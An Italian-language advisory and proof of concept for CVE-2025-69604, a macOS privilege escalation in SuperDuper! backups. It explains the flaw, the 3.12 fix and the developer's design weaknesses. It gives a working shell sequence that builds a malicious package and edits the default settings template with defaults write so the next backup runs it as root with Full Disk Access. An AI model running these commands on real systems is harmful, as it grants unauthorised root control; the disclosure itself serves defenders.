
Proof-of-concept di exploit per CVE-2025-69604, che dimostra l'escalation dei privilegi tramite installazione di pacchetti dannosi nelle attività di backup di SuperDuper su macOS.
Questa vulnerabilità è simile a quella descritta in CVE-2025-61229 – un attaccante può modificare il modello di attività per far sì che le attività di backup di SuperDuper installino un pacchetto arbitrario. Il pacchetto può quindi eseguire script shell come utente root e con il massimo livello di accesso alla privacy (accesso completo al disco).
Punteggio CVSS 3.1: Il punteggio NVD è in attesa.
Per evitare questa vulnerabilità, elimina l'applicazione SuperDuper! o applica l'aggiornamento 3.12.
Questa analisi dell'exploit e la prova di concetto sono fornite solo a scopo educativo. Usala a tuo rischio.
Nella mia precedente analisi della vulnerabilità SuperDuper CVE-2025-61229, ho scoperto che il modello delle impostazioni predefinite di SuperDuper era ancora intrinsecamente insicuro anche dopo che lo sviluppatore ha risolto quella vulnerabilità nell'aggiornamento SuperDuper 3.11. Quell'aggiornamento ha risolto solo la vulnerabilità specifica descritta in CVE-2025-61229, ma non ha affrontato il fatto che un attaccante potesse modificare il modello di attività predefinito. Sfortunatamente, il modello di attività include la funzionalità per installare pacchetti, quindi un attaccante può modificare il modello di attività per specificare un pacchetto che può installare software o eseguire script shell come utente root e con accesso completo al disco.
Lo sviluppatore ha mitigato questa vulnerabilità rimuovendo la funzionalità "installa pacchetto". Di nuovo, il modello delle impostazioni delle attività può ancora essere modificato da un attaccante, e lo sviluppatore ha persino indicato che ciò non potrebbe essere risolto senza infastidire l'utente (cioè richiedere all'utente di autenticarsi ogni volta che l'attività viene modificata). Quindi sembra che il modello di attività predefinito rimarrà vulnerabile alla modifica per il futuro prevedibile perché lo sviluppatore non è riuscito a trovare un altro modo per renderlo più sicuro.
Vale la pena ripetere la mia conclusione precedente: I privilegi di root e l'Accesso Completo al Disco sono i privilegi più elevati che un software possa ottenere su macOS. Qualsiasi sviluppatore che richieda tali privilegi dovrebbe scrivere software che aderisca ai principi moderni di progettazione della sicurezza e alle migliori pratiche. Questa vulnerabilità, così come quelle esposte in CVE-2025-57489 e CVE-2025-61228, e persino l'ammissione dello stesso sviluppatore che questi problemi persistono da 22 anni, dimostrano che SuperDuper non è stato progettato per essere un prodotto sicuro e non ha visto miglioramenti regolari del design in 22 anni per aderire alle migliori pratiche moderne.
Questa vulnerabilità viene attaccata quasi esattamente allo stesso modo di CVE-2025-61229, quindi mi riferirò in gran parte alla mia precedente analisi di quella vulnerabilità qui. La seguente Prova di Concetto dimostra l'exploit con la versione 3.11 di SuperDuper:
mkdir -p /tmp/scripts
cd ~; export home=`pwd`; export user=`whoami`
printf '#!/bin/bash\n' > /tmp/scripts/preinstall
printf "ls -l $home/Desktop > /Library/private_data.txt\n" >> /tmp/scripts/preinstall
chmod a+x /tmp/scripts/preinstall
pkgbuild --identifier com.gray.sdexploit --nopayload --scripts /tmp/scripts /tmp/attack.pkg
cd ~/'Library/Application Support/SuperDuper!/Saved Settings/.Default Settings.sdsp'
cp 'Session Settings.sdss' Settings.plist
defaults write "`pwd`"/Settings.plist SDshouldInstallPackage -bool YES
defaults write "`pwd`"/Settings.plist SDinstallerPackage /tmp/attack.pkg
cp Settings.plist 'Session Settings.sdss'
Dopo aver eseguito questi comandi, basta eseguire un backup con le impostazioni predefinite e attack.pkg verrà installato con privilegi di root e accesso completo al disco. Il risultato finale è un file chiamato "private_data" in /Library (cioè scrivibile solo da root) che contiene un elenco della cartella Desktop (cioè accessibile solo dal codice eseguito con accesso completo al disco).